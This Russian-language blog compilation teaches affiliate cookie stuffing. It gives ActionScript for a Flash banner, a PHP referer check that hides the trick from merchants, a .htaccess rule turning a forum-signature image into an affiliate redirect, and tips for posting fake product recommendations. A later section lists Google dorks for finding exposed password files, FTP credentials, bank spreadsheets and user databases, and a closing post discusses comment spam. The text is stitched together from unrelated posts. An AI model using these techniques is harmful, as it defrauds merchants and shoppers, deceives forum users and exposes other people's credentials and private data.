Cookie Stuffing с Flash, также как и с помощью картинки, вызывает рефссылку и посылает её в куках посетителю. Флеш-ролик собран в swf файл и он должен быть сперва декомпилирован, перед тем, как ты просмотришь исходный код на языке actionscript, в котором и будет прописана необходимая нам уловка в рефссылкой.

Тебе нужен какой-нибудь flash-редактор, например Flash MX или что-то похожее, для того, чтобы добавить или изменить код actionscript. Мой пример использует систему eB4y, поэтому мой конечный результат будет одним из их баннеров, который ты можешь найти на их сайте если зарегишься как партнёр.

Внешний вид баннера не так важен, так как вся фишка в самом коде, который я объясню ниже:

import flash.net.URLRequest;
import flash.net.sendToURL;
import flash.net.navigateToURL;
import flash.net.*;
import flash.events.Event;

Security.allowDomain("http://www.yourdomain.net/");
Security.allowDomain("http://rover.eb4y.com/");
Security.allowDomain("http://cgi.eb4y.com/");

//-------------------------------------------------------------------
var url:String = "http://www.yourdomain.net/script.php";
var reqURL:URLRequest = new URLRequest(url);
var loader:URLLoader = new URLLoader(reqURL);
loader.addEventListener(Event.COMPLETE, handleComplete);
loader.dataFormat = URLLoaderDataFormat.VARIABLES;

function handleComplete( event:Event):void
{
var loader:URLLoader = URLLoader(event.target);
var safe:Number = new Number(loader.data["safe"]);
var url:Number = new Number(loader.data["url"]);

if(safe==1)
{
var request:URLRequest = new URLRequest(url);
flash.net.sendToURL(request);
}
}

Как ты видишь из кода, мы создали запрос к скрипту по адресу «http://www.yourdomain.net/script.php», который возвращает запрос с ключом, названным «safe«. Safe означает, что это безопасно для подмены кук посетителю. Это сделано с помощью реферера посетителя, для того, чтобы убедиться, что он не продавец, которого мы облапошили. Просто мера предосторожности, ничего более.

Если наш запрос возвращает переменную safe со значением 1, тогда мы посылаем запрос за нужной рефссылкой. Добавь этот код actionscript в свой флеш-баннер и у тебя будет готовый объект с подменой кук.

Страница со скриптом script.php – это обычная php страница, которая анализирует реферер, для того, чтобы убедиться в том, что он в белом списке разрешенных адресов. Он также отсылает обратно результат переменной safe и рефссылку, которая нам нужна. Мы посылаем всё это через php, потому что ты можешь захотеть контролировать и посылать урлы основанные на местонахождении пользователя, браузере и так далее…

$referer = $_SERVER['HTTP_REFERER'];

if ( substr((trim($referer)),0,20)!="http://cgi.eb4y.com/") //location your stuffing at
{
echo "safe=1&url=" . $affiliate_url;
}
else {
echo "safe=0&url=" . $affiliate_url;
}

Это всё, что тебе нужно. Вот тебе напоследок работающий пример такого скрипта – кликай! Удачи!

Кто-то использует ифреймы 1 на 1 пиксель чтобы загрузить страницу (свою рефссылку) на другой странице, которая разместит нужные куки у «жертвы». И с этого времени… если жертва последует твоим ссылкам на аффилиат страницу с твоей рефссылкой или без – не играет никакой роли, в любом случае нужные куки уже размещены у пользователя и когда он завершит покупку продукта – ты получишь свой процент.

Проблема состоит в том, что большинство этих методов подмены кук может легко отследить любой продавец, покупатель или кто-нибудь другой очень любопытный, которому приспичило поинтересоваться чем же ты здесь занимаешься. Всё это раскрывается простым просмотром html-кода на странице – правый клик и «vew source».

Тут ты увидишь немного более продвинутую технику подмены кук с использованием картинки и небольших правил в htaccess файле. Этот способ будет получше, чем использование ифреймов, т.к. он более безопасный от тех засранцев, которые хотят узнать о тебе больше, просматривая код страницы.

Мы просто размещаем картинку на наших страницах, например так:

<img src="imagefolder/somepixel.jpg" />

у этой картинки будет .htaccess правило в «imagefolder» (папка с картинкой), которое будет линковать картинку на твою рефссылку. Так как куки посылаются через заголовки, то этого будет достаточно, чтобы разместить твою рефссылку в куках пользователя, просто линкуя их в исходном коде. Это всё будет сделано в фоне, так что тот, кто будет специально высматривать подмену кук, широко обломится и ты избежишь негативных последствий от использования Cookie Stuffing.

Вот, как должно выглядеть правило в .htaccess:

RewriteEngine On
RewriteRule somepixel.jpg http://www.affiliateurl.com [R,L]

Не забудь только его разместить в папку, где лежит твоя картинка.

Дела пойдут ещё лучше, если ты применишь смекалку.

Существует X XXX XXX форумов, которые позволят тебе добавить в свою подпись картинку, поэтому тебе достаточно найти такие форумы с бурным обсуждением, которые будут связаны с твоим продуктом. В этом случае ты сможешь подменить куки просто присоединившись к популярному обсуждению на этих форумах.

Давай возьмём какой-нибудь продукт для примера, так я смогу тебе показать как присоединяться к желаемой аудитории через форумы. Предположим, что наш продукт (к которому мы имеем рефссылку) очень популярен и всё, что нам нужно – погуглить в поисках обсуждений, связанных с ним, но нам не подойдут любые обсуждения. Мы заинтересованы лишь в тех обсуждениях, в которых люди спрашивают больше информации перед тем, как они обычно делают свою покупку. Такие типы обсуждений привлекут больше заинтересованных людей в этом продукте. Поэтому всё, что тебе нужно, ответить в нужном топике, что «Продукт – очень хороший и его однозначно стоит покупать». А вся соль в твоей подписи, в которой добавлена твоя магическая картинка.

Вот тебе пример запроса в гугле, который покажет такие результаты:
inurl:forum is magniwork good

Magniwork – это электронная книга, которую я взял на кликбанке (clickbank) специально для этого тутора.

Удачи!

Что такое cookie stuffing?

Cookie stuffing далеко не новая фишка. Если погуглишь, то ты найдёшь тысячи туторов и рассказов об этой фиче.

В крации: Cookie Stuffing, он же cookie dropping – это чёрный метод заработка, который заключается в том, что посетителю сайта подкладываются трёхуровневые куки, куки с другого сайта. По такому принципу работает Гугл Адсенс и другие рекламные сети.

Этот метод безопасный?

Cookie stuffing черный метод заработка, который подвергает тебя риску, как и все другие методы такого типа. Перед тем как ты будешь использовать эти техники, ты должен чётко понимать, что всегда есть шанс того, что тебя споймают, забанят или даже будут преследовать один из тех ребят, с которого ты доишь деньги.

Часто этот метод используется для партнёрского маркетинга.

Как это работает?

Обычно, как работают куки – вы размещаете куки у посетителя, когда он посещает ваш сайт. Куки должны быть помещены на продающей странице, а не на той, которая является всего-лишь промежуточной (блог, целевая страница, форум и т.д.), но вы используете некоторые скрипты, которые загружают ту нужную вам страницу в фоне, при том, что он не посещал продающую страницу. Эти куки держаться 30-90 дней и если посетитель покупает продукт, который вы ему «накукили», завтра или на следующей неделе, то продавец поделиться с вами баблом, потому что в браузере этого покупателя была ссылка с нужным аффилиат урлом.

Это выгодно?

Это может быть выгодным. Обычно даже ОЧЕНЬ Выгодным. Я дам вам пример парня, который делал это на покер-сайте.

Он зарегистрировался как партнёр на одной из покер-партнёрок и использовал картинку для размещения кук, чтобы направить аффилиатские куки посетителю. Картинку он добавил как подпись на форуме, где люди общались о покере и сайтах, посвященных покеру. Аудитория форума состояла из любителей поиграть в покер онлайн, таким образом мы можем назвать их покупателями, до этого у него прибыль была нулевая.

Дальше он запустил систему, он начал участвовать в обсуждениях (помните, всего-лишь его подпись подменивала куки) и рекомендовал везде нужные сайты. Так как форум был очень популярным, он получил этим методом несколько тысяч человек с нужным аффилиат урлом в куках. Некоторые из них переросли в покупателей. Некоторые из покупателей тратили до 40К$ на одном сайте (да, некоторые люди играю в эту игру действительно на большие деньги), так что, он получил пятизначные суммы чистого профита $xx,xxx всего-лишь за несколько постов.

продолжение темы будет в следующих постах…

Хаки Гугла – специально сформированные запросы, для поиска конкретных страниц и сайтов, используемых, например, в чёрном СЕО.

Index.of master.passwd – поиск паролей во Фряхе
Index.of /admin – ищем открытую админку, вдруг какой то дебил забыл расставить chmod -ы
Index.of ws_ftp.ini – пароли от фтп ( не всегда конечно , но… )
Index.of «amount.xls» – банковские базы
filetype:sql inurl: users – базы данных
intitle:Index of dbconvert.exe chats – логи чата в Асе
site:jp filetype : pl inurl: txt – подключение файлика через функцию open() (инклуд)
filetype : php inurl: file – инклуд
inurl:main.php Welcome to phpMyAdmin – дыра в phpMyAdmin
site:gov inurl: Confidential filetype : pdf – конфиденциальная инфа
inurl:number filetype: asp – баги в asp скриптах.

intitle:»index of» «Parent Directory» «infected mushroom» – пример поиска музыки (вместо infected mushroom вбить название исполнителя или альбом)

thanks 4 nulled and zarazakaza

Статьи по теме:
http://johnny.ihackstuff.com/ghdb.php – архив хаков
http://webxakep.net/articles/articles-internet/1730-httpmyforum.net.uahtmlemoticonsclap.gif.html – предохраняйте свои сайты

Наблюдал сегодня на своём блоге, молодцы креативщики-спамеры.

Суть Метода

Смысл этого вида спама в комментарии в том, что спамится одна записаь в посте блога, мне пришло около 30 спамерских комментариев за сутки.

И где-то в середине этого хаоса проскакивает комментарий: Надо чистить каменты, это совсем никуда не лезит

Мда. Сам хотел отписаться этому комментатору и поблагодарить. Хорошо, что проверил его принадлежность к нежелательным гостям. Ниже, кстати, для тех кто не знает, способ как это сделать.

Как Проверить Спамность Комментария

Если вам пришёл креативный комментарий в котором вы сомневаетесь. Вы не уверены, что этот комментарий оставил ваш читатель.

То достаточно ввести его каммент в гугле и вы сразу же найдёте ответ ;)

Успехов в борьбе со спамом!

Недавно наткнулся на ещё одни псевдоосмысленные комментарии:

1. Добрый день!
Интересный у вас сайт.
Теперь на vip-prime.com буду чаще заходить

Как вам такое? Новичок-блоггер точно не просечет фишку, что это спам.

2. Не подскажите какой-нить ридер rss лент получше? Чтобы можно было удобно посты читать. Для винды их немало, но я на Мак ОС ноут мак бук про себе взял

Ещё один крассический случай – спросить автора блога о чём-то.

——

Кстати, насчёт спама в комментарии – как полезного инструмента для раскрутки своего проекта. Но сейчас давайте посмотрим на полезность спама в комментарии не со стороны спамера, а со стороны блога, в который спамят.

Есть у меня один развлекательный проект, вы его знаете, – Ka-Boom!. Проект очень перспективный и интересный, его я создал для конкурса, но заниматься им абсолютно нет времени, причем настолько, что приходящий туда постоянно спам я не удаляю из-за лени.

В результате, скопилось достаточно много спамовых сообщений, а приличные пользователи, незнакомые со спамом в комментарии, могут принять его за сообщения таких же адекватных людей. Просмотрите тот сайт, не поленитесь.

В результате у пользователей создаётся иллюзия полносты и популярности сайта. Насыщеннсоти пользователи и социализации, что подталкивает этих пользователей к активности и создаёт небольшой авторитет в их глазах.

Осталось только этот авторитет увеличить :)